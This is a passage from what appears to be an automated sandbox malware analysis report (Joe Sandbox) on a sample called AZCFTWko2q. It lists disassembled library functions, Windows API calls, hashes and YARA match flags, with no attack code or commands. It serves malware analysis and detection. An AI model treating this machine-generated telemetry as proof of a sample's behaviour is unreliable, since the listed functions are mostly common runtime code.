                                                                                                                                                                                                                                                                                      • Instruction ID: d941d7adcdfcb95fe7f1ae92eeb0e95f25cd9e5dbb2d3936931fab3d4402dca1
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 66048b5912d9800ecb047d2b21c4276ce59f10e340e5510923950ad1c38f33ca
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FEE02BB09002206EC300BF766C4A66E3274750130AB500B2BB151D21D2EEBCD1844A9D
                                                                                                                                                                                                                                                                                      Function 024D2794 Relevance: 6.0, APIs: 4, Instructions: 24COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetNumaHighestNodeNumber.KERNEL32(?,?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,024D0DA0), ref: 024D279E
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,024D0DA0), ref: 024D27AD
                                                                                                                                                                                                                                                                                      • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024D27C3
                                                                                                                                                                                                                                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 024D27D1
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8HighestLastNodeNumaNumberThrow
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3016159387-0
                                                                                                                                                                                                                                                                                      • Opcode ID: aa1fe1726c391e6c90679c86a0ef38e15e3ee04fdf49ded71e00b6b13b472e10
                                                                                                                                                                                                                                                                                      • Instruction ID: 2273669cd7aa61b4e11c449df833e79c751df83d04d4f1c7c7468d3929b81fd5
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: aa1fe1726c391e6c90679c86a0ef38e15e3ee04fdf49ded71e00b6b13b472e10
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 10E0867860010AA7CB10FBB6DD49EAF73BC6E00B06B600566E915E3151EBA9D7088B79
                                                                                                                                                                                                                                                                                      Function 0041252D Relevance: 6.0, APIs: 4, Instructions: 24COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetNumaHighestNodeNumber.KERNEL32(?,?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,00410B39), ref: 00412537
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,00410B39), ref: 00412546
                                                                                                                                                                                                                                                                                      • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041255C
                                                                                                                                                                                                                                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0041256A
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8HighestLastNodeNumaNumberThrow
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3016159387-0
                                                                                                                                                                                                                                                                                      • Opcode ID: aa1fe1726c391e6c90679c86a0ef38e15e3ee04fdf49ded71e00b6b13b472e10
                                                                                                                                                                                                                                                                                      • Instruction ID: 7399f334bae95f1f5dd7aa6ec606231f62b338b040d4ba0de61eab0e9ab47a66
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: aa1fe1726c391e6c90679c86a0ef38e15e3ee04fdf49ded71e00b6b13b472e10
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A1E0D87060010AABC700EBB5DE4AAEF73BC7A00605B600166A101E2151EA6CDA44877C
                                                                                                                                                                                                                                                                                      Function 024D28EC Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • SetThreadPriority.KERNEL32(?,?), ref: 024D28F8
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 024D2904
                                                                                                                                                                                                                                                                                      • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024D291A
                                                                                                                                                                                                                                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 024D2928
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastPriorityThreadThrow
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 4286982218-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 2e8a5abc4ba5302a065f6319043aedef3fe0da521bb0a121bd2973cc84f30b77
                                                                                                                                                                                                                                                                                      • Instruction ID: ffb71400c590614d438e3b0c0ec50f2094892fbde1828a2bbec055433c675308
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2e8a5abc4ba5302a065f6319043aedef3fe0da521bb0a121bd2973cc84f30b77
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 76E0863460010967DF14FF72CD05BBB37AC7F00745B500966FC15D20A1EB76D1048A98
                                                                                                                                                                                                                                                                                      Function 024D29B2 Relevance: 6.0, APIs: 4, Instructions: 23COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • TlsSetValue.KERNEL32(?,00000000,024D7BD8,00000000,?,?,024D0DA0,?,?,?,00000000,?,00000000), ref: 024D29BE
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,00000000,?,00000000), ref: 024D29CA
                                                                                                                                                                                                                                                                                      • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024D29E0
                                                                                                                                                                                                                                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 024D29EE
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrowValue
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1964976909-0
                                                                                                                                                                                                                                                                                      • Opcode ID: e92b9239321077a6426b58042713b272637ac11e22ba0cdbfa846f2b38cfd992
                                                                                                                                                                                                                                                                                      • Instruction ID: 831fb25a63ebcbc694f7501391d7b1f5e527aae6e41b028b5350b1b541343898
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e92b9239321077a6426b58042713b272637ac11e22ba0cdbfa846f2b38cfd992
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 09E086342001096BDF10FF71CC08BBF376C6F00745B500966FD19D20A1EB76D1149AA8
                                                                                                                                                                                                                                                                                      Function 00412685 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • SetThreadPriority.KERNEL32(?,?), ref: 00412691
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 0041269D
                                                                                                                                                                                                                                                                                      • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004126B3
                                                                                                                                                                                                                                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 004126C1
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastPriorityThreadThrow
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 4286982218-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 2e8a5abc4ba5302a065f6319043aedef3fe0da521bb0a121bd2973cc84f30b77
                                                                                                                                                                                                                                                                                      • Instruction ID: eb1a6d40bee4d863ba02ef3eb8c9f1a5d1f26ddbf15ae4e912fb13e181a4c061
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2e8a5abc4ba5302a065f6319043aedef3fe0da521bb0a121bd2973cc84f30b77
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3CE04F34600119ABCB14BF619E06BAF376C7A00745B50052AB515D10A2EE79D564869C
                                                                                                                                                                                                                                                                                      Function 0041274B Relevance: 6.0, APIs: 4, Instructions: 23COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • TlsSetValue.KERNEL32(?,00000000,00417971,00000000,?,?,00410B39,?,?,?,00000000,?,00000000), ref: 00412757
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,00000000,?,00000000), ref: 00412763
                                                                                                                                                                                                                                                                                      • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412779
                                                                                                                                                                                                                                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00412787
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrowValue
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1964976909-0
                                                                                                                                                                                                                                                                                      • Opcode ID: e92b9239321077a6426b58042713b272637ac11e22ba0cdbfa846f2b38cfd992
                                                                                                                                                                                                                                                                                      • Instruction ID: 63a90eab5ccd82633b541feab557f5b3d99097aee930e3f4eaa44923ec20be65
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e92b9239321077a6426b58042713b272637ac11e22ba0cdbfa846f2b38cfd992
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 43E04F34600119AADB10BF619E0AAAF37A87A00A45B50052AB915D10A2EE79D564869C
                                                                                                                                                                                                                                                                                      Function 024D2959 Relevance: 6.0, APIs: 4, Instructions: 21memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • TlsAlloc.KERNEL32(?,024D0DA0), ref: 024D295F
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 024D296C
                                                                                                                                                                                                                                                                                      • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024D2982
                                                                                                                                                                                                                                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 024D2990
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: AllocConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3103352999-0
                                                                                                                                                                                                                                                                                      • Opcode ID: cf5c7426e44f0e531d76730010d1233fe0a142eb59a03d1d9f3b17062cc15993
                                                                                                                                                                                                                                                                                      • Instruction ID: e1d80c824b98b0671147d1b610b0e9e8808907467c2d582b7aa7e6a49ac86936
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cf5c7426e44f0e531d76730010d1233fe0a142eb59a03d1d9f3b17062cc15993
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2CE0C230100105678B14FBB99C48A7B32A86A01716B600B6BF871E30E1EBA9D1084AA8
                                                                                                                                                                                                                                                                                      Function 004126F2 Relevance: 6.0, APIs: 4, Instructions: 21memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • TlsAlloc.KERNEL32(?,00410B39), ref: 004126F8
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 00412705
                                                                                                                                                                                                                                                                                      • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041271B
                                                                                                                                                                                                                                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00412729
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: AllocConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3103352999-0
                                                                                                                                                                                                                                                                                      • Opcode ID: cf5c7426e44f0e531d76730010d1233fe0a142eb59a03d1d9f3b17062cc15993
                                                                                                                                                                                                                                                                                      • Instruction ID: 71e6de1c8af28f534afd96217d060265c7bf952bbd0c624222ea3419adf54434
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cf5c7426e44f0e531d76730010d1233fe0a142eb59a03d1d9f3b17062cc15993
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2AE0CD34500115578714BB755D0AABF72587901719B600B1AF131D20D1FB6CD458429C
                                                                                                                                                                                                                                                                                      Function 0042F07D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • __startOneArgErrorHandling.LIBCMT ref: 0042F10D
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ErrorHandling__start
                                                                                                                                                                                                                                                                                      • String ID: pow
                                                                                                                                                                                                                                                                                      • API String ID: 3213639722-2276729525
                                                                                                                                                                                                                                                                                      • Opcode ID: cb57d0990ecd4e157a276670056fa63ecf5c6ef3cb6d4436f05d56c4fa4236c6
                                                                                                                                                                                                                                                                                      • Instruction ID: 9c0c3c151ae2a5a6b50f0fee57114a4457493f87fddc68121f24b850b116d2d7
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cb57d0990ecd4e157a276670056fa63ecf5c6ef3cb6d4436f05d56c4fa4236c6
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8C515D61B04302D6DB117714E90137BABA0EB54B40FE4597FF491813E9EE3D8CAA9A4F
                                                                                                                                                                                                                                                                                      Function 024FB0D0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,024FB32B,?,00000050,?,?,?,?,?), ref: 024FB1AB
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID: ACP$OCP
                                                                                                                                                                                                                                                                                      • API String ID: 0-711371036
                                                                                                                                                                                                                                                                                      • Opcode ID: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
                                                                                                                                                                                                                                                                                      • Instruction ID: 6dc8561be9c3b197c987c549b32d6757210d39e4635540fdf6410c5b1cc622e7
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BD21A762A00105A6EBB68F54CF01797725AEBCABDDF4A8126EB09D7304E732D941C390
                                                                                                                                                                                                                                                                                      Function 0043AE69 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,0043B0C4,?,00000050,?,?,?,?,?), ref: 0043AF44
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID: ACP$OCP
                                                                                                                                                                                                                                                                                      • API String ID: 0-711371036
                                                                                                                                                                                                                                                                                      • Opcode ID: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
                                                                                                                                                                                                                                                                                      • Instruction ID: 14488b359d73a2b35151aaad325e7c1d9f20b01c06d3923b8e2598dc1437a59e
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F3212BA2AC4101A6DB30CB54C907B977366EF5CB11F569526E98AC7300F73ADD11C39E
                                                                                                                                                                                                                                                                                      Function 00401F0A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GdipGetImageEncodersSize.GDIPLUS(?,?), ref: 00401F25
                                                                                                                                                                                                                                                                                      • GdipGetImageEncoders.GDIPLUS(?,?,00000000), ref: 00401F4A
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: EncodersGdipImage$Size
                                                                                                                                                                                                                                                                                      • String ID: image/png
                                                                                                                                                                                                                                                                                      • API String ID: 864223233-2966254431
                                                                                                                                                                                                                                                                                      • Opcode ID: a4116aea5856e167c2c377b93ae464baf6efd33a5122bb5b4e0eea2d33bbdf28
                                                                                                                                                                                                                                                                                      • Instruction ID: a861e299a60b9ced5094bb1731eec5177a5b987cbaa8a1425c649574426e8627
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a4116aea5856e167c2c377b93ae464baf6efd33a5122bb5b4e0eea2d33bbdf28
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 04119476D00109FFCB01AFA99C8149EBB76FE41321B60027BE810B21E0C7755F419A58
                                                                                                                                                                                                                                                                                      Function 0040EF26 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • SetLastError.KERNEL32(0000000D,?,0040DE41,0040C659,?,?,00000000,?,0040C529,0045D5E4,0040C4F6,0045D5DC,?,ios_base::failbit set,0040C659), ref: 0040EFAA
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ErrorLast
                                                                                                                                                                                                                                                                                      • String ID: F(@
                                                                                                                                                                                                                                                                                      • API String ID: 1452528299-2698495834
                                                                                                                                                                                                                                                                                      • Opcode ID: 28a02ce365c990727b7b4e8bf51613b6bc71088fada4a4c5b2d2716d252c928d
                                                                                                                                                                                                                                                                                      • Instruction ID: 02fe8a739a07683bc60ca74788e4bb9a0325118a5e4d2b20450d6bc28493fa7e
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 28a02ce365c990727b7b4e8bf51613b6bc71088fada4a4c5b2d2716d252c928d
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2B11C236300216BFCF165F66DD4496AB765BB08B11B11483AFA05A6290CA7498219BD9
                                                                                                                                                                                                                                                                                      Function 0040C510 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 39COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • ___std_exception_destroy.LIBVCRUNTIME ref: 0040C554
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ___std_exception_destroy
                                                                                                                                                                                                                                                                                      • String ID: F(@$ios_base::failbit set
                                                                                                                                                                                                                                                                                      • API String ID: 4194217158-1828034088
                                                                                                                                                                                                                                                                                      • Opcode ID: 326c062bbd77b351e70a003f48f611e5e8c7415ec1b2fbce5622d8111c151cd5
                                                                                                                                                                                                                                                                                      • Instruction ID: 4ba2cac2fce41df0eb0aef52a6a00c17a8a4a8275336f9ee0f9be7dda5d805c6
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 326c062bbd77b351e70a003f48f611e5e8c7415ec1b2fbce5622d8111c151cd5
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 27F0B472A0022836D2302B56BC02B97F7CC8F50B69F14443FFE05A6681EBF8A94581EC
                                                                                                                                                                                                                                                                                      Function 0044068A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: H_prolog3_catch
                                                                                                                                                                                                                                                                                      • String ID: MOC$RCC
                                                                                                                                                                                                                                                                                      • API String ID: 3886170330-2084237596
                                                                                                                                                                                                                                                                                      • Opcode ID: 97e7bd69da2a212c52dfa9d68122ee8a36af56c02b3e00c92559e584b2ae2017
                                                                                                                                                                                                                                                                                      • Instruction ID: e9e4e095770ca636dcca3efe7f5224ff47edcbfbbe98bab9d98b6a8866433d4c
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 97e7bd69da2a212c52dfa9d68122ee8a36af56c02b3e00c92559e584b2ae2017
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 81F0AF70600224CFDB22AF95D40159D3B60AF82748F8281A7F9009B262C73C6E14CFAE
                                                                                                                                                                                                                                                                                      Function 00404E07 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • std::_Locinfo::_Locinfo.LIBCPMT ref: 00404E3C
                                                                                                                                                                                                                                                                                        • Part of subcall function 0040BF5D: std::_Lockit::_Lockit.LIBCPMT ref: 0040BF71
                                                                                                                                                                                                                                                                                        • Part of subcall function 0040BF5D: std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040BFAE
                                                                                                                                                                                                                                                                                      • std::_Locinfo::~_Locinfo.LIBCPMT ref: 00404E50
                                                                                                                                                                                                                                                                                        • Part of subcall function 0040C008: std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 0040C02F
                                                                                                                                                                                                                                                                                        • Part of subcall function 0040C008: std::_Lockit::~_Lockit.LIBCPMT ref: 0040C0A0
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: std::_$Locinfo::_$LocinfoLockit$Locinfo::~_Locinfo_ctorLocinfo_dtorLockit::_Lockit::~_
